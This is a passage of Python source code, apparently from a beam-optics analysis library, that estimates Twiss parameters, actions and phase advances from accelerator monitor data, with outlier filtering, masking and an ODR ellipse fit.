        if self.use_model:
            # precomputed model phase advances for each (i, j) and (i, k) pair
            self.fx_ij, self.sigma_fx_ij = self.model.fx_ij.to(self.dtype).to(self.device), self.model.sigma_fx_ij.to(self.dtype).to(self.device)
            self.fx_ik, self.sigma_fx_ik = self.model.fx_ik.to(self.dtype).to(self.device), self.model.sigma_fx_ik.to(self.dtype).to(self.device)
            self.fy_ij, self.sigma_fy_ij = self.model.fy_ij.to(self.dtype).to(self.device), self.model.sigma_fy_ij.to(self.dtype).to(self.device)
            self.fy_ik, self.sigma_fy_ik = self.model.fy_ik.to(self.dtype).to(self.device), self.model.sigma_fy_ik.to(self.dtype).to(self.device)
        # NOTE(review): 'flag != None' — prefer 'flag is not None'; equality comparison against None is fragile for tensor arguments
        if self.use_model and flag != None:
            size, length, *_ = self.index.shape
            self.mask = torch.ones((size, length)).to(torch.bool).to(self.device)
            # note, the loop variable 'flag' shadows the parameter from here on
            for location, flag in enumerate(self.flag):
                if not flag and self.model.flag[location] != 0:
                    # other is True for combinations that do not involve the disabled location
                    _, other = self.index.swapaxes(0, -1)
                    other = torch.mul(*(other != location).swapaxes(0, 1)).T
                    self.mask = (self.mask == other)
def get_action(self, *,
data_threshold:dict={'use': True, 'factor': 5.0},
data_dbscan:dict={'use': False, 'factor': 2.5},
data_local_outlier_factor:dict={'use': False, 'contamination': 0.01},
data_isolation_forest:dict={'use': False, 'contamination': 0.01},
bx:torch.Tensor=None, by:torch.Tensor=None,
sigma_bx:torch.Tensor=None, sigma_by:torch.Tensor=None) -> None:
"""
Estimate actions at each monitor location with optional data cleaning and estimate action center and spread.
Parameters
----------
data_threshold: dict
parameters for threshold detector
data_dbscan: dict
parameters for dbscan detector
data_local_outlier_factor: dict
parameters for local outlier factor detector
data_isolation_forest: dict
parameters for isolation forest detector
bx: torch.Tensor
bx values at monitor locations
by: torch.Tensor
by values at monitor locations
sigma_bx: torch.Tensor
bx errors at monitor locations
sigma_by: torch.Tensor
by errors at monitor locations
Returns
-------
None, update self.action dictionary
"""
self.action = {}
index = self.model.monitor_index
bx = bx if bx is not None else self.model.bx[index]
by = by if by is not None else self.model.by[index]
sigma_bx = sigma_bx if sigma_bx is not None else self.model.sigma_bx[index]
sigma_by = sigma_by if sigma_by is not None else self.model.sigma_by[index]
jx = self.table.ax**2/(2.0*bx)
jy = self.table.ay**2/(2.0*by)
sigma_jx = self.table.ax**2/bx**2*self.table.sigma_ax**2
sigma_jx += self.table.ax**4/bx**4/4*sigma_bx**2
sigma_jx.sqrt_()
sigma_jy = self.table.ay**2/by**2*self.table.sigma_ay**2
sigma_jy += self.table.ay**4/by**4/4*sigma_by**2
sigma_jy.sqrt_()
mask = torch.clone(self.flag[index])
mask = torch.stack([mask, mask]).to(torch.bool)
data = standardize(torch.stack([jx, jy]), center_estimator=median, spread_estimator=biweight_midvariance)
if data_threshold['use']:
factor = data_threshold['factor']
center = median(data)
spread = biweight_midvariance(data).sqrt()
min_value, max_value = center - factor*spread, center + factor*spread
mask *= threshold(data, min_value, max_value)
if data_dbscan['use']:
factor = data_dbscan['factor']
for case in range(1):
mask[case] *= dbscan(data[case].reshape(-1, 1), epsilon=factor)
if data_local_outlier_factor['use']:
for case in range(1):
mask[case] *= local_outlier_factor(data[case].reshape(-1, 1), contamination=data_local_outlier_factor['contamination'])
if data_isolation_forest['use']:
for case in range(1):
mask[case] *= isolation_forest(data[case].reshape(-1, 1), contamination=data_isolation_forest['contamination'])
mask_jx, mask_jy = mask
mask_jx, mask_jy = mask_jx/sigma_jx**2, mask_jy/sigma_jy**2
center_jx = weighted_mean(jx, weight=mask_jx)
spread_jx = weighted_variance(jx, weight=mask_jx, center=center_jx).sqrt()
center_jy = weighted_mean(jy, weight=mask_jy)
spread_jy = weighted_variance(jy, weight=mask_jy, center=center_jy).sqrt()
self.action['jx'], self.action['sigma_jx'] = jx, sigma_jx
self.action['center_jx'], self.action['spread_jx'] = center_jx, spread_jx
self.action['jy'], self.action['sigma_jy'] = jy, sigma_jy
self.action['center_jy'], self.action['spread_jy'] = center_jy, spread_jy
self.action['mask'] = mask
def get_twiss_from_amplitude(self) -> None:
"""
Estimate twiss from amplitude.
Note, action dictionary should be precomputed
Parameters
----------
None
Returns
-------
None, update self.twiss_from_amplitude dictionary
"""
if self.action == {}:
raise Exception('error: action dictionary is empty')
self.data_amplitude = {}
ax, sigma_ax = self.table.ax, self.table.sigma_ax
ay, sigma_ay = self.table.ay, self.table.sigma_ay
jx, sigma_jx = self.action['center_jx'], self.action['spread_jx']
jy, sigma_jy = self.action['center_jy'], self.action['spread_jy']
bx, by = ax**2/(2.0*jx), ay**2/(2.0*jy)
sigma_bx = torch.sqrt(ax**2/jx**2*sigma_ax**2 + 0.25*ax**4/jx**4*sigma_jx**2)
sigma_by = torch.sqrt(ay**2/jy**2*sigma_ay**2 + 0.25*ay**4/jy**4*sigma_jy**2)
index = self.model.monitor_index
bx_model, by_model = self.model.bx[index], self.model.by[index]
self.data_amplitude['bx'], self.data_amplitude['sigma_bx'] = bx, sigma_bx
self.data_amplitude['by'], self.data_amplitude['sigma_by'] = by, sigma_by
def phase_virtual(self, limit:int=None, exclude:list=None, **kwargs) -> None:
"""
Estimate x & y phase for virtual locations.
Parameters
----------
limit: int
range limit to use
exclude: list
list of virtual location to exclude
**kwargs:
passed to Decomposition.phase_virtual
Returns
-------
None, update self.virtual_x and self.virtual_y dictionaries
"""
self.virtual_x, self.virtual_y = {}, {}
limit = max(self.limit) if limit is None else limit
exclude = [] if exclude is None else exclude
index = [index for index in self.model.virtual_index if index not in exclude]
nux, sigma_nux = self.table.nux, self.table.sigma_nux
NUX, sigma_NUX = self.model.nux, self.model.sigma_nux
nuy, sigma_nuy = self.table.nuy, self.table.sigma_nuy
NUY, sigma_NUY = self.model.nuy, self.model.sigma_nuy
fx, sigma_fx = self.fx, self.sigma_fx
FX, sigma_FX = self.model.fx, self.model.sigma_fx
fy, sigma_fy = self.fy, self.sigma_fy
FY, sigma_FY = self.model.fy, self.model.sigma_fy
def auxiliary_x(probe):
return Decomposition.phase_virtual(probe, limit, self.flag, nux, NUX, fx, FX,
sigma_frequency=sigma_nux, sigma_frequency_model=sigma_NUX,
sigma_phase=sigma_fx, sigma_phase_model=sigma_FX,
**kwargs)
def auxiliary_y(probe):
return Decomposition.phase_virtual(probe, limit, self.flag, nuy, NUY, fy, FY,
sigma_frequency=sigma_nuy, sigma_frequency_model=sigma_NUY,
sigma_phase=sigma_fy, sigma_phase_model=sigma_FY,
**kwargs)
data_x = [auxiliary_x(probe) for probe in index]
data_y = [auxiliary_y(probe) for probe in index]
for count, probe in enumerate(index):
self.virtual_x[probe], self.virtual_y[probe] = data_x[count], data_y[count]
self.fx[probe], self.sigma_fx[probe] = self.virtual_x[probe].get('model')
self.fy[probe], self.sigma_fy[probe] = self.virtual_y[probe].get('model')
def phase_correct(self, *, limit:int=None, **kwargs) -> None:
"""
Correct x & y phase for monitor locations.
Note, this introduce strong bias towards model, do not use large range limit
Note, phase at the location is not used
Parameters
----------
limit: int
range limit
**kwargs:
passed to phase_virtual Decomposition method
Returns
-------
None, update self.correct_x and self.correct_y dictionaries
"""
self.correct_x, self.correct_y = {}, {}
limit = max(self.limit) if limit is None else limit
index = self.model.monitor_index
self.fx_correct, self.sigma_fx_correct = torch.clone(self.fx), torch.clone(self.sigma_fx)
self.fy_correct, self.sigma_fy_correct = torch.clone(self.fy), torch.clone(self.sigma_fy)
nux, sigma_nux = self.table.nux, self.table.sigma_nux
NUX, sigma_NUX = self.model.nux, self.model.sigma_nux
nuy, sigma_nuy = self.table.nuy, self.table.sigma_nuy
NUY, sigma_NUY = self.model.nuy, self.model.sigma_nuy
fx, sigma_fx = self.fx, self.sigma_fx
FX, sigma_FX = self.model.fx, self.model.sigma_fx
fy, sigma_fy = self.fy, self.sigma_fy
FY, sigma_FY = self.model.fy, self.model.sigma_fy
def auxiliary_x(probe):
return Decomposition.phase_virtual(probe, limit, self.flag, nux, NUX, fx, FX,
sigma_frequency=sigma_nux, sigma_frequency_model=sigma_NUX,
sigma_phase=sigma_fx, sigma_phase_model=sigma_FX,
**kwargs)
def auxiliary_y(probe):
return Decomposition.phase_virtual(probe, limit, self.flag, nuy, NUY, fy, FY,
sigma_frequency=sigma_nuy, sigma_frequency_model=sigma_NUY,
sigma_phase=sigma_fy, sigma_phase_model=sigma_FY,
**kwargs)
data_x = [auxiliary_x(probe) for probe in index]
data_y = [auxiliary_y(probe) for probe in index]
for count, probe in enumerate(index):
self.correct_x[probe], self.correct_y[probe] = data_x[count], data_y[count]
self.fx_correct[probe], self.sigma_fx_correct[probe] = self.correct_x[probe].get('model')
self.fy_correct[probe], self.sigma_fy_correct[probe] = self.correct_y[probe].get('model')
@staticmethod
def phase_alfa(a_m:torch.Tensor,
f_ij:torch.Tensor, f_m_ij:torch.Tensor,
f_ik:torch.Tensor, f_m_ik:torch.Tensor,
*,
error:bool=True, model:bool=True,
sigma_a_m:torch.Tensor=0.0,
sigma_f_ij:torch.Tensor=0.0, sigma_f_m_ij:torch.Tensor=0.0,
sigma_f_ik:torch.Tensor=0.0, sigma_f_m_ik:torch.Tensor=0.0) -> tuple:
"""
Estimate twiss alfa at index (i) from given triplet (i, j, k) phase data.
Note, probed index (i), other indices (j) and (k), pairs (i, j) and (i, k)
Phase advance is assumed to be from (i) to other indices, should be negative if (i) is ahead of the other index (timewise)
Parameters
----------
a_m: torch.Tensor
model value
f_ij: torch.Tensor
phase advance between probed and the 1st index (j)
f_m_ij: torch.Tensor
model phase advance between probed and the 1st index (j)
f_ik: torch.Tensor
phase advance between probed and the 2nd index (k)
f_m_ik: torch.Tensor
model phase advance between probed and 2nd index (k)
error: bool
flag to compute error
model: bool
flag to include model error
sigma_a_m: torch.Tensor
model value error
sigma_f_ij: torch.Tensor
phase advance error between probed and the 1st index (j)
sigma_f_m_ij: torch.Tensor
model phase advance error between probed and the 1st index (j)
sigma_f_ik: torch.Tensor
phase advance error between probed and the 2nd index (k)
sigma_f_m_ik: torch.Tensor
model phase advance error between probed and the 2nd index (k)
Returns
-------
(a, 0) or (a, sigma_a)
"""
a = a_m*(1.0/torch.tan(f_ij)-1.0/torch.tan(f_ik))/(1.0/torch.tan(f_m_ij)-1.0/torch.tan(f_m_ik))-1.0/torch.tan(f_ij)*1.0/torch.sin(f_m_ij - f_m_ik)*torch.cos(f_m_ik)*torch.sin(f_m_ij) + 1.0/torch.tan(f_ik)*1.0/torch.sin(f_m_ij - f_m_ik)*torch.cos(f_m_ij)*torch.sin(f_m_ik)
if not error:
return (a, torch.zeros_like(a))
sigma_a = sigma_f_ij**2*(1.0/torch.sin(f_ij))**4*(1.0/torch.tan(f_m_ik) + a_m)**2/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2
sigma_a += sigma_f_ik**2*(1.0/torch.sin(f_ik))**4*(1.0/torch.tan(f_m_ij) + a_m)**2/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2
if model:
sigma_a += sigma_a_m**2*((1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2)
sigma_a += sigma_f_m_ik**2*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2*(1.0/torch.sin(f_m_ij - f_m_ik))**4*torch.sin(f_m_ij)**2*(torch.cos(f_m_ij) + a_m*torch.sin(f_m_ij))**2
sigma_a += sigma_f_m_ij**2*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2*(1.0/torch.sin(f_m_ij - f_m_ik))**4*torch.sin(f_m_ik)**2*(torch.cos(f_m_ik) + a_m*torch.sin(f_m_ik))**2
sigma_a.sqrt_()
return (a, sigma_a)
@staticmethod
def phase_beta(b_m:torch.Tensor,
f_ij:torch.Tensor, f_m_ij:torch.Tensor,
f_ik:torch.Tensor, f_m_ik:torch.Tensor,
*,
error:bool=True, model:bool=True,
sigma_b_m:torch.Tensor=0.0,
sigma_f_ij:torch.Tensor=0.0, sigma_f_m_ij:torch.Tensor=0.0,
sigma_f_ik:torch.Tensor=0.0, sigma_f_m_ik:torch.Tensor=0.0) -> tuple:
"""
Estimate twiss beta at index (i) from given triplet (i, j, k) phase data.
Note, probed index (i), other indices (j) and (k), pairs (i, j) and (i, k)
Phase advance is assumed to be from (i) to other indices, should be negative if (i) is ahead of the other index (timewise)
Parameters
----------
b_m: torch.Tensor
model value
f_ij: torch.Tensor
phase advance between probed and the 1st index (j)
f_m_ij: torch.Tensor
model phase advance between probed and the 1st index (j)
f_ik: torch.Tensor
phase advance between probed and the 2nd index (k)
f_m_ik: torch.Tensor
model phase advance between probed and 2nd index (k)
error: bool
flag to compute error
model: bool
flag to include model error
sigma_b_m: torch.Tensor
model value error
sigma_f_ij: torch.Tensor
phase advance error between probed and the 1st index (j)
sigma_f_m_ij: torch.Tensor
model phase advance error between probed and the 1st index (j)
sigma_f_ik: torch.Tensor
phase advance error between probed and the 2nd index (k)
sigma_f_m_ik: torch.Tensor
model phase advance error between probed and the 2nd index (k)
Returns
-------
(b, 0) or (b, sigma_b)
"""
b = b_m*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))
if not error:
return (b, torch.zeros_like(b))
sigma_b = sigma_f_ij**2*b_m**2*(1.0/torch.sin(f_ij))**4/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2
sigma_b += sigma_f_ik**2*b_m**2*(1.0/torch.sin(f_ik))**4/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2
if model:
sigma_b += sigma_b_m**2*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2
sigma_b += sigma_f_m_ij**2*b_m**2*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2*(1.0/torch.sin(f_m_ij))**4/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**4
sigma_b += sigma_f_m_ik**2*b_m**2*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2*(1.0/torch.sin(f_m_ik))**4/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**4
sigma_b.sqrt_()
return (b, sigma_b)
def get_twiss_from_phase(self, *, virtual:bool=True, error:bool=True, model:bool=False,
use_correct:bool=False, use_correct_sigma:bool=False, use_model:bool=False) -> None:
"""
Estimate twiss from phase data.
Note, raw data is saved, no cleaning is performed
Values (and errors) are computed for each triplet
Parameters
----------
error: bool
flag to compute twiss errors
model: bool
flag to include model error
use_correct: bool
flag to use corrected phases
use_correct_sigma: bool
flag to use corrected phase errors
use_model: bool
flag to use precomputed model data
Returns
-------
None, update self.twiss_from_phase dictionary
"""
self.data_phase = {}
fx = self.fx_correct if use_correct else self.fx
fy = self.fy_correct if use_correct else self.fy
sigma_fx = self.sigma_fx_correct if use_correct_sigma else self.sigma_fx
sigma_fy = self.sigma_fy_correct if use_correct_sigma else self.sigma_fy
ax_m, bx_m = self.model.ax, self.model.bx
ay_m, by_m = self.model.ay, self.model.by
index = self.combo.swapaxes(0, -1)
value, sigma = Decomposition.phase_advance(*index, self.table.nux, fx, error=error, model=False, sigma_frequency=self.table.sigma_nux, sigma_phase=sigma_fx)
fx_ij, fx_ik = value.swapaxes(0, 1)
sx_ij, sx_ik = sigma.swapaxes(0, 1)
value, sigma = Decomposition.phase_advance(*index, self.table.nuy, fy, error=error, model=False, sigma_frequency=self.table.sigma_nuy, sigma_phase=sigma_fy)
fy_ij, fy_ik = value.swapaxes(0, 1)
sy_ij, sy_ik = sigma.swapaxes(0, 1)
if use_model:
fx_m_ij, fx_m_ik = self.fx_ij, self.fx_ik
sx_m_ij, sx_m_ik = self.sigma_fx_ij, self.sigma_fx_ik
fy_m_ij, fy_m_ik = self.fy_ij, self.fy_ik
sy_m_ij, sy_m_ik = self.sigma_fy_ij, self.sigma_fy_ik
else:
value, sigma = Decomposition.phase_advance(*index, self.model.nux, self.model.fx, error=error*model, model=True, sigma_frequency=self.model.sigma_nux, sigma_phase=self.model.sigma_fx)
fx_m_ij, fx_m_ik = value.swapaxes(0, 1)
sx_m_ij, sx_m_ik = sigma.swapaxes(0, 1)
value, sigma = Decomposition.phase_advance(*index, self.model.nuy, self.model.fy, error=error*model, model=True, sigma_frequency=self.model.sigma_nuy, sigma_phase=self.model.sigma_fy)
fy_m_ij, fy_m_ik = value.swapaxes(0, 1)
sy_m_ij, sy_m_ik = sigma.swapaxes(0, 1)
ax, sigma_ax = self.phase_alfa(ax_m, fx_ij, fx_m_ij, fx_ik, fx_m_ik, error=error, model=model, sigma_a_m=self.model.sigma_ax, sigma_f_ij=sx_ij, sigma_f_ik=sx_ik, sigma_f_m_ij=sx_m_ij, sigma_f_m_ik=sx_m_ik)
bx, sigma_bx = self.phase_beta(bx_m, fx_ij, fx_m_ij, fx_ik, fx_m_ik, error=error, model=model, sigma_b_m=self.model.sigma_bx, sigma_f_ij=sx_ij, sigma_f_ik=sx_ik, sigma_f_m_ij=sx_m_ij, sigma_f_m_ik=sx_m_ik)
ay, sigma_ay = self.phase_alfa(ay_m, fy_ij, fy_m_ij, fy_ik, fy_m_ik, error=error, model=model, sigma_a_m=self.model.sigma_ay, sigma_f_ij=sy_ij, sigma_f_ik=sy_ik, sigma_f_m_ij=sy_m_ij, sigma_f_m_ik=sy_m_ik)
by, sigma_by = self.phase_beta(by_m, fy_ij, fy_m_ij, fy_ik, fy_m_ik, error=error, model=model, sigma_b_m=self.model.sigma_by, sigma_f_ij=sy_ij, sigma_f_ik=sy_ik, sigma_f_m_ij=sy_m_ij, sigma_f_m_ik=sy_m_ik)
self.data_phase['fx_ij'], self.data_phase['sigma_fx_ij'], self.data_phase['fx_m_ij'], self.data_phase['sigma_fx_m_ij'] = fx_ij.T, sx_ij.T, fx_m_ij.T, sx_m_ij.T
self.data_phase['fx_ik'], self.data_phase['sigma_fx_ik'], self.data_phase['fx_m_ik'], self.data_phase['sigma_fx_m_ik'] = fx_ik.T, sx_ik.T, fx_m_ik.T, sx_m_ik.T
self.data_phase['fy_ij'], self.data_phase['sigma_fy_ij'], self.data_phase['fy_m_ij'], self.data_phase['sigma_fy_m_ij'] = fy_ij.T, sy_ij.T, fy_ij.T, sy_m_ij.T
self.data_phase['fy_ik'], self.data_phase['sigma_fy_ik'], self.data_phase['fy_m_ik'], self.data_phase['sigma_fy_m_ik'] = fy_ik.T, sy_ik.T, fy_ik.T, sy_m_ik.T
self.data_phase['ax'], self.data_phase['sigma_ax'], self.data_phase['bx'], self.data_phase['sigma_bx'] = ax.T, sigma_ax.T, bx.T, sigma_bx.T
self.data_phase['ay'], self.data_phase['sigma_ay'], self.data_phase['by'], self.data_phase['sigma_by'] = ay.T, sigma_ay.T, by.T, sigma_by.T
def filter_twiss(self, plane:str = 'x', *,
phase:dict={'use': True, 'threshold': 10.00},
model:dict={'use': True, 'threshold': 00.50},
value:dict={'use': True, 'threshold': 00.50},
sigma:dict={'use': True, 'threshold': 00.25},
limit:dict={'use': True, 'threshold': 05.00}) -> dict:
"""
Filter twiss for given data plane and cleaning options.
Parameters
----------
plane: str
data plane ('x' or 'y')
phase: dict
clean based on advance phase data
used if 'use' is True, remove combinations with absolute value of phase advance cotangents above threshold value
model: dict
clean based on phase advance proximity to model
used if 'use' is True, remove combinations with (x - x_model)/x_model > threshold value
value: dict
clean based on estimated twiss beta error value
used if 'use' is True, remove combinations with x/sigma_x < 1/threshold value
sigma: dict
clean based on estimated phase advance error value
used if 'use' is True, remove combinations with x/sigma_x < 1/threshold value
limit: dict
clean outliers outside scaled interval
used if 'use' is True
Returns
-------
mask (torch.Tensor)
"""
size, length, *_ = self.index.shape
mask = torch.ones((size, length), device=self.device).to(torch.bool)
if plane == 'x':
a_m, b_m = self.model.ax.reshape(-1, 1), self.model.bx.reshape(-1, 1)
a, b, sigma_a, sigma_b = self.data_phase['ax'], self.data_phase['bx'], self.data_phase['sigma_ax'], self.data_phase['sigma_bx']
f_ij, sigma_f_ij, f_m_ij, sigma_f_m_ij = self.data_phase['fx_ij'], self.data_phase['sigma_fx_ij'], self.data_phase['fx_m_ij'], self.data_phase['sigma_fx_m_ij']
f_ik, sigma_f_ik, f_m_ik, sigma_f_m_ik = self.data_phase['fx_ik'], self.data_phase['sigma_fx_ik'], self.data_phase['fx_m_ik'], self.data_phase['sigma_fx_m_ik']
if plane == 'y':
a_m, b_m = self.model.ay.reshape(-1, 1), self.model.by.reshape(-1, 1)
a, b, sigma_a, sigma_b = self.data_phase['ay'], self.data_phase['by'], self.data_phase['sigma_ay'], self.data_phase['sigma_by']
f_ij, sigma_f_ij, f_m_ij, sigma_f_m_ij = self.data_phase['fy_ij'], self.data_phase['sigma_fy_ij'], self.data_phase['fy_m_ij'], self.data_phase['sigma_fy_m_ij']
f_ik, sigma_f_ik, f_m_ik, sigma_f_m_ik = self.data_phase['fy_ik'], self.data_phase['sigma_fy_ik'], self.data_phase['fy_m_ik'], self.data_phase['sigma_fy_m_ik']
if phase['use']:
cot_ij, cot_m_ij = torch.abs(1.0/torch.tan(f_ij)), torch.abs(1.0/torch.tan(f_m_ij))
cot_ik, cot_m_ik = torch.abs(1.0/torch.tan(f_ij)), torch.abs(1.0/torch.tan(f_m_ij))
mask *= phase['threshold'] > cot_ij
mask *= phase['threshold'] > cot_m_ij
mask *= phase['threshold'] > cot_ik
mask *= phase['threshold'] > cot_m_ik
if model['use']:
mask *= model['threshold'] > torch.abs((f_ij - f_m_ij)/f_m_ij)
mask *= model['threshold'] > torch.abs((f_ik - f_m_ik)/f_m_ik)
if value['use']:
mask *= value['threshold'] > torch.abs((b - b_m)/b_m)
if sigma['use']:
mask *= 1/sigma['threshold'] < torch.abs(f_ij/sigma_f_ij)
mask *= 1/sigma['threshold'] < torch.abs(f_ik/sigma_f_ik)
if limit['use']:
factor = torch.tensor(limit['threshold'], dtype=self.dtype, device=self.device)
mask *= threshold(standardize(a, center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
mask *= threshold(standardize(b, center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
return mask
    def mask_range(self, limit:tuple) -> torch.Tensor:
        """
        Generate weight mask based on given range limit.
        Parameters
        ----------
        limit: tuple
            range limit to use, (min, max), 1 <= min <= max, min is excluded, for full range min==max
        Returns
        -------
        weight mask (torch.Tensor)
        """
        size, length, *_ = self.shape
        mask = torch.zeros((size, length), dtype=torch.int64, device=self.device)
        # combination counts per range limit value; the comprehension variable 'limit'
        # shadows the parameter inside the list scope only
        count = torch.tensor([limit*(2*limit - 1) for limit in range(1, max(self.limit) + 1)], dtype=torch.int64, device=self.device)
        # stage 1: mark combinations selected by the requested range in full-range coordinates
        # NOTE(review): limit_min > limit_max is not validated here (unlike __init__) — confirm callers pass a valid range
        limit_min, limit_max = limit
        if limit_min == limit_max:
            count = count[:limit_max]
            *_, count_max = count
            mask[:, :count_max] = 1
        if limit_min < limit_max:
            count = count[limit_min - 1:limit_max]
            count_min, *_, count_max = count
            mask[:, count_min:count_max] = 1
        # stage 2: slice the mask down to the instance range (self.limit) so its columns
        # align with self.combo/self.index, which were trimmed the same way in __init__
        count = torch.tensor([limit*(2*limit - 1) for limit in range(1, max(self.limit) + 1)], dtype=torch.int64, device=self.device)
        limit_min, limit_max = self.limit
        if limit_min == limit_max:
            count = count[:limit_max]
            *_, count_max = count
            mask = mask[:, :count_max]
        if limit_min < limit_max:
            count = count[limit_min - 1:limit_max]
            count_min, *_, count_max = count
            mask = mask[:, count_min:count_max]
        return mask
    def mask_location(self, table:list) -> torch.Tensor:
        """
        Generate weight mask with given locations removed.
        Parameters
        ----------
        table: list
            list of locations to remove
        Returns
        -------
        weight mask (torch.Tensor)
        """
        size, length, *_ = self.combo.shape
        mask = torch.zeros((size, length), dtype=torch.int64, device=self.device)
        for location in table:
            # other is True for combinations whose (j, k) indices both differ from the current location
            _, other = self.index.swapaxes(0, -1)
            other = torch.mul(*(other != location).swapaxes(0, 1)).T
            # chained equality acts as XNOR with the accumulated mask
            # NOTE(review): with several locations, a combination hit by an even number of them
            # flips back to True before logical_not — confirm this is the intended semantics
            mask = (mask == other)
        return mask.logical_not()
def mask_distance(self, function) -> torch.Tensor:
"""
Generate weight mask based on given range limit.
Parameters
----------
function: Callable
function to apply to distance data
Returns
-------
weight mask (torch.Tensor)
"""
mask = torch.stack([function(distance) for distance in self.distance])
mask = torch.stack([mask for _ in range(self.size)])
return mask
def process_twiss(self, plane:str='x', *,
weight:bool=True, mask:torch.Tensor=None) -> dict:
"""
Process twiss data.
Parameters
----------
plane: str
data plane ('x' or 'y')
weight: bool
flag to use weights
mask: torch.Tensor
mask
Returns
-------
twiss data (dict)
dict_keys(['value_a', 'sigma_a', 'error_a', 'value_b', 'sigma_b', 'error_b'])
"""
result = {}
if mask == None:
size, length, *_ = self.index.shape
mask = torch.ones((size, length), device=self.device).to(torch.bool)
if plane == 'x':
a, sigma_a, a_m = self.data_phase['ax'], self.data_phase['sigma_ax'], self.model.ax
b, sigma_b, b_m = self.data_phase['bx'], self.data_phase['sigma_bx'], self.model.bx
if plane == 'y':
a, sigma_a, a_m = self.data_phase['ay'], self.data_phase['sigma_ay'], self.model.ay
b, sigma_b, b_m = self.data_phase['by'], self.data_phase['sigma_by'], self.model.by
if not weight:
center = weighted_mean(a, weight=mask)
spread = weighted_variance(a, weight=mask, center=center).sqrt()
result['value_a'] = center
result['sigma_a'] = spread
result['error_a'] = (center - a_m)/a_m
center = weighted_mean(b, weight=mask)
spread = weighted_variance(b, weight=mask, center=center).sqrt()
result['value_b'] = center
result['sigma_b'] = spread
result['error_b'] = (center - b_m)/b_m
return result
weight = (mask.to(self.dtype)/sigma_a**2).nan_to_num(posinf=0.0, neginf=0.0)
center = weighted_mean(a, weight=weight)
spread = weighted_variance(a, weight=weight, center=center).sqrt()
result['value_a'] = center
result['sigma_a'] = spread
result['error_a'] = (center - a_m)/a_m
weight = (mask.to(self.dtype)/sigma_b**2).nan_to_num(posinf=0.0, neginf=0.0)
center = weighted_mean(b, weight=weight)
spread = weighted_variance(b, weight=weight, center=center).sqrt()
result['value_b'] = center
result['sigma_b'] = spread
result['error_b'] = (center - b_m)/b_m
if plane == 'x':
self.ax, self.sigma_ax = result['value_a'], result['sigma_a']
self.bx, self.sigma_bx = result['value_b'], result['sigma_b']
if plane == 'y':
self.ay, self.sigma_ay = result['value_a'], result['sigma_a']
self.by, self.sigma_by = result['value_b'], result['sigma_b']
return result
def get_twiss_from_data(self, n:int, x:torch.Tensor, y:torch.Tensor, *,
                        refit:bool=False, factor:float=5.0,
                        level:float=1.0E-6, sigma_x:torch.Tensor=None, sigma_y:torch.Tensor=None,
                        ax:torch.Tensor=None, bx:torch.Tensor=None, ay:torch.Tensor=None, by:torch.Tensor=None,
                        transport:torch.Tensor=None, **kwargs) -> dict:
    """
    Estimate twiss from tbt data using ODR fit.

    Note, if no initial guesses for twiss and/or transport are given, model values will be used.
    This method is sensitive to noise and calibration errors.

    Each monitor is paired with the next one; the pair of signals (q1, q2) plus the
    (m11, m12) transport elements between them define an implicit ellipse whose
    parameters (alpha, beta, action) are fitted with scipy.odr.

    Parameters
    ----------
    n: int
        number of turns to use
    x: torch.Tensor
        x data, indexed as x[monitor, turn]
    y: torch.Tensor
        y data, indexed as y[monitor, turn]
    refit: bool
        flag to refit twiss using estimated invariants
    factor: float
        threshold factor for invariants spread (outlier rejection)
    sigma_x: torch.Tensor
        x noise sigma for each signal
    sigma_y: torch.Tensor
        y noise sigma for each signal
    level: float
        default noise level (used when sigma_x/sigma_y are not given)
    ax, bx, ay, by: torch.Tensor
        initial guess for twiss parameters at monitor locations
    transport: torch.Tensor
        transport matrices between monitor locations
    **kwargs:
        forwarded to scipy.odr.ODR

    Returns
    -------
    fit result (dict)
        dict_keys(['jx', 'ax', 'bx', 'sigma_jx', 'sigma_ax', 'sigma_bx', 'jy', 'ay', 'by', 'sigma_jy', 'sigma_ay', 'sigma_by', 'mux', 'muy'])
    """
    # fall back to model twiss at the monitors when no initial guess is given
    if ax is None:
        ax = self.model.ax[self.model.monitor_index].cpu().numpy()
    else:
        ax = ax.cpu().numpy()
    if bx is None:
        bx = self.model.bx[self.model.monitor_index].cpu().numpy()
    else:
        bx = bx.cpu().numpy()
    if ay is None:
        ay = self.model.ay[self.model.monitor_index].cpu().numpy()
    else:
        ay = ay.cpu().numpy()
    if by is None:
        by = self.model.by[self.model.monitor_index].cpu().numpy()
    else:
        by = by.cpu().numpy()
    if transport is None:
        # model transport from each monitor to the next; the last pair wraps around the ring
        probe = torch.tensor(self.model.monitor_index, dtype=torch.int64, device=self.device)
        other = torch.roll(probe, -1)
        other[-1] += self.model.size
        transport = self.model.matrix(probe, other)
    copy = torch.clone(transport)  # NOTE(review): never used below — candidate for removal
    def ellipse(w, x):
        # implicit ODR model: courant-snyder invariant expressed through the pair
        # (q1, q2) and transport elements (m11, m12); zero on the fitted ellipse
        alpha, beta, action = w
        q1, q2, m11, m12 = x
        return 1/beta*(q1**2 + (alpha*q1 + beta*(q2 - q1*m11)/m12)**2) - action
    value_jx, error_jx = [], []
    value_jy, error_jy = [], []
    value_ax, error_ax = [], []
    value_ay, error_ay = [], []
    value_bx, error_bx = [], []
    value_by, error_by = [], []
    for i in range(self.model.monitor_count):
        # x plane: pair monitor i with monitor i + 1
        q1 = x[i, :n].cpu().numpy()
        q2 = x[int(mod(i + 1, self.model.monitor_count)), :n].cpu().numpy()
        if i + 1 == self.model.monitor_count:
